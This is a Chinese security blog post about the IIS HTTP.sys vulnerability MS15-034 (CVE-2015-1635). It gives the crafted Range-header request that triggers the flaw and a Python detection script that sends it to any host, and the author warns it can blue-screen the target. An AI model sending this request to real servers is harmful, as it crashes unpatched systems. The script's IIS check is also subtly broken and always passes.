<!DOCTYPE html><html lang="en"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="与其哀叹，不如埋头苦干"><title>MS15-034 | Mochazz's blog</title><link rel="stylesheet" type="text/css" href="/css/style.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="stylesheet" href="//cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script></head><link rel="stylesheet" type="text/css" href="/css/customize.css"><link rel="stylesheet" type="text/css" href="/plugins/prettify/doxy.css"><script type="text/javascript" src="/js/ready.js" async></script><body><div class="mobile-head" id="mobile-head"><div class="navbar-icon"><span></span><span></span><span></span></div><div class="navbar-title"><a href="/"></a></div><div class="navbar-search"><!--= show a circle here--></div></div><div class="h-wrapper" id="menu"><nav class="h-head box"><div class="m-hdimg"><a class="hdimg img" href="/"><img class="nofancybox" src="/img/tx.jpeg" width="128" height="128"></a><h1 class="ttl"><a href="/">Mochazz's blog</a></h1></div><p class="m-desc">与其哀叹，不如埋头苦干</p><div class="m-nav"><ul><li><span class="dot">●</span><a href="/archives/">归档</a></li><li><span class="dot">●</span><a href="/about/">关于</a></li><span class="dot">●</span><span>友链</span><li><span class="dot">●</span><span class="dot">●</span><a href="http://www.lmxspace.com">l1nk3r</a></li><li><span class="dot">●</span><span class="dot">●</span><a href="https://www.virzz.com">Virink</a></li><li><span class="dot">●</span><span class="dot">●</span><a href="http://sec2hack.com">Wfox</a></li><li><span class="dot">●</span><span class="dot">●</span><a href="http://www.lsafe.org">离心</a></li><li><span class="dot">●</span><span class="dot">●</span><a href="https://www.kingkk.com">kingkk</a></li><li><span class="dot">●</span><span class="dot">●</span><a href="https://www.hpdoger.cn">hpdoger</a></li><li><span class="dot">●</span><span class="dot">●</span><a href="https://www.smi1e.top">smi1e</a></li></ul></div></nav></div><div id="back2Top"><a class="fa fa-arrow-up" title="Back to top" href="#"></a></div><div class="box" id="container"><div class="l-wrapper"><div class="l-content box"><div class="l-post l-post-art"><article class="p-art"><div class="p-header box"><h1 class="p-title">MS15-034</h1><div class="p-info"><span class="p-date"><i class="fa fa-calendar"></i><a href="/2017/08/16/ms15-034/">2017-08-16</a></span><span class="p-category"><i class="fa fa-folder"></i><a href="/categories/服务安全/">服务安全</a></span><span class="p-view" id="busuanzi_container_page_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_page_pv"></span></span></div></div><div class="p-content"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>前一阵子在对某网站进行漏洞扫描时，发现存在MS15-034远程代码执行漏洞。这是一个位于HTTP.SYS中的整数溢出漏洞。UlpParseRange处发生了整数溢出，而在此处导致了安全检查的绕过。具体的分析，还是看360的<a href="http://blogs.360.cn/blog/cve_2015_6135_http_rce_analysis/" target="_blank" rel="noopener">这篇</a>分析吧。</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>通过给IIS服务器发送如下格式的HTTP请求，就可以触发（检测）这个漏洞</p>
<pre><code>GET / HTTP/1.1
Host: stuff
Range: bytes=0-18446744073709551615
</code></pre><p><a id="more"></a><img src="/img/MS15-034/m1.png" alt></p>
<h3 id="检测脚本"><a href="#检测脚本" class="headerlink" title="检测脚本"></a>检测脚本</h3><pre><code>#!/usr/bin/env python
# -*- coding: utf-8 -*-
#The IIS Vul （CVE-2015-1635，MS15-034）Check Script.
#HTTP.sys Remote Code Execute.
###############################################
# example: python ms15-034.py www.example.com #
###############################################
import sys
import requests

def Check_CVE_2015_1635(Ip_Str):
    if Ip_Str:
        Server_Tag = [&apos;Microsoft-HTTP&apos;,&apos;Microsoft-IIS&apos;]
        Tmp_Req_Url = str(&apos;&apos;.join([&apos;http://&apos;,Ip_Str]))
        Request_Tmp = requests.get(Tmp_Req_Url)
        remote_server = Request_Tmp.headers[ &apos;server&apos;]
        if (tmp_tag in remote_server for tmp_tag in Server_Tag):
            print(&quot;[+] Web Service Is &quot; + remote_server)
            MS15_034_Execute(Tmp_Req_Url)
        else:
            print(&quot;[+] Web Service Is Not IIS\n[+] May Be &quot; + remote_server)

def MS15_034_Execute(domain):
    print(&quot;[+] Start Checking...&quot;)
    Req_headers = {&apos;Host&apos;: &apos;stuff&apos;,&apos;Range&apos;: &apos;bytes=0-18446744073709551615&apos;}
    Request = requests.get(domain, headers=Req_headers)
    if &apos;Requested Range Not Satisfiable&apos; in Request.content:
        print(&quot;[+] The HTTP.sys remote code execution vulnerability Is Exists!&quot;)
    elif &apos;The request has an invalid header name&apos; in Request.content:
        print(&quot;[+] The vulnerability has been fixed!&quot;)
    else:
        print(&quot;[+] The IIS service was unable to display the vulnerability exists, the need for manual testing!&quot;)

def main():
    ip_Str = sys.argv[1]
    Check_CVE_2015_1635(ip_Str)

if __name__ == &apos;__main__&apos;:
    main()
</code></pre><h3 id="测试结果"><a href="#测试结果" class="headerlink" title="测试结果"></a>测试结果</h3><p><img src="/img/MS15-034/m2.png" alt><br>这个验证脚本在验证时，会导致系统蓝屏，测试时请谨慎使用。<br>相关文章：<br><a href="http://blogs.360.cn/blog/cve_2015_6135_http_rce_analysis/" target="_blank" rel="noopener">MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞分析</a><br><a href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank" rel="noopener">Microsoft Security Bulletin MS15-034 - Critical Vulnerability in HTTP.sys Could Allow Remote Code Execution</a></p>
</div><div class="p-copyright"><blockquote><div class="p-copyright-author"><span class="p-copyright-key">本文作者：</span><span class="p-copytight-value"><a href="https://mochazz.github.io">Mochazz</a></span></div><div class="p-copyright-link"><span class="p-copyright-key">本文链接：</span><span class="p-copytight-value"><a href="/2017/08/16/ms15-034/">https://mochazz.github.io/2017/08/16/ms15-034/</a></span></div><div class="p-copyright-note"><span class="p-copyright-key">版权声明：</span><span class="p-copytight-value">本博客所有文章除特殊声明外，均采用<a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/"> CC BY-NC 4.0 </a>许可协议。转载请注明出处 <a href="https://mochazz.github.io">Mochazz的博客</a>！</span></div></blockquote></div></article><div class="p-info box"><span class="p-tags"><i class="fa fa-tag"></i><a href="/tags/ms15-034/">ms15-034</a></span></div></div><section class="p-ext"><div class="l-pager l-pager-dtl box"><a class="prev" href="/2017/08/19/linux_on_udisk/">&lt; 可移动的linux系统</a><a class="next" href="/2017/08/13/php(5)/">PHP之面向对象 &gt;</a></div><div id="valine-comment"><style type="text/css">.v * { color: #CECECE; }
.v a { color: #0F9FB4; }
.v a:hover { color: #216C73; }
.v li { list-style: inherit; }
.v .vwrap { border: 1px solid #223441; border-radius: 0; }
.v .vwrap:hover { box-shadow: 0 0 6px 1px #223441; }
.v .vbtn { border-radius: 0; color: #cecece; background: none; }
.v .vlist .vcard .vh { border-bottom-color: #293D4E; }
.v .vwrap .vheader .vinput { border-bottom-color: #223441; }
.v .vwrap .vheader .vinput:focus { border-bottom-color: #339EB4; }
.v code, .v pre,.v .vlist .vcard .vhead .vsys { background: #203240; }
.v .vlist .vcard .vcontent.expand:before { background: linear-gradient(180deg,hsla(206,33%,19%,0),hsla(206,33%,19%,.9)); }
.v .vlist .vcard .vcontent.expand:after { background: hsla(206,33%,19%,.9); }</style><div id="vcomment"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script><script>var notify = 'true' == true ? true : false;
var verify = 'false' == true ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'cFxDjSziPHq4xGCbSpRGkND7-gzGzoHsz',
  appKey:'YhJIRxQHzY9Aix5pSGnYxKkv',
  placeholder:'ヾﾉ≧∀≦)o留下评论再走吧',
  avatar:'wavatar',
  guest_info:guest_info,
  pageSize:'10'
})</script></div></section><footer><p>Copyright © 2017 - 2019 <a href="/." rel="nofollow">Mochazz's blog</a> | <strong><a rel="nofollow" target="_blank" href="https://creativecommons.org/licenses/by-nc/4.0/">CC BY-NC 4.0</a></strong><br><span id="busuanzi_container_site_uv"><i class="fa fa-user"></i><span id="busuanzi_value_site_uv"></span></span> <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i><span id="busuanzi_value_site_pv"></span></span> | Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a>Theme with<a rel="nofollow" target="_blank" href="https://github.com/litreily/snark-hexo"> snark.</a></p></footer></div></div></div><script type="text/javascript" src="/plugins/prettify/prettify.js"></script><script type="text/javascript" src="/js/search.js"></script><script type="text/javascript" src="/js/top.js"></script><script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script type="text/javascript" src="//cdn.bootcss.com/fancybox/3.3.5/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=0.0.1" async></script><link rel="stylesheet" type="text/css" href="//cdn.bootcss.com/fancybox/3.3.5/jquery.fancybox.min.css"></body></html>